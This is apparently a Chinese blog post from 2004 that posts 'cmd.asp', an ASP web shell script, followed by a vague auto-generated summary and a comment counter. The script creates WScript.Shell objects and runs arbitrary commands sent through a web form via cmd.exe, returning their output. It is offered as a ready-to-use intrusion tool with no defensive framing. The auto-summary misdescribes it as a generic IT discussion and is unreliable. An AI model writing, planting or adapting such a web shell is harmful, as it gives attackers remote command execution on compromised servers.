| 本文作者:lcx 文章出处:未知 文章性质:原创 阅读次数:28 发布日期:2004-10-24 |
| <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if %> <form method="post"> <input type=text name="cmdx" size=60 value="cmd.exe地址,可更改可默认"><br> <input type=text name="cmd" size=60><br> <input type=submit value="cmd命令"></form> <textarea readonly cols=80 rows=20> <%On Error Resume Next if request("cmdx")="cmd.exe地址,可更改可默认" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end if response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall %> </textarea> cmd.asp |
cmd.asp [自定cmd.exe地址]
信息技术相关元素探讨
最新推荐文章于 2025-07-17 09:29:35 发布
博客涉及信息技术领域相关内容,包含input、cmd、object、server、c等元素,但具体内容未给出。推测可能围绕这些元素在信息技术中的应用、特性等方面展开。

1254

被折叠的 条评论
为什么被折叠?



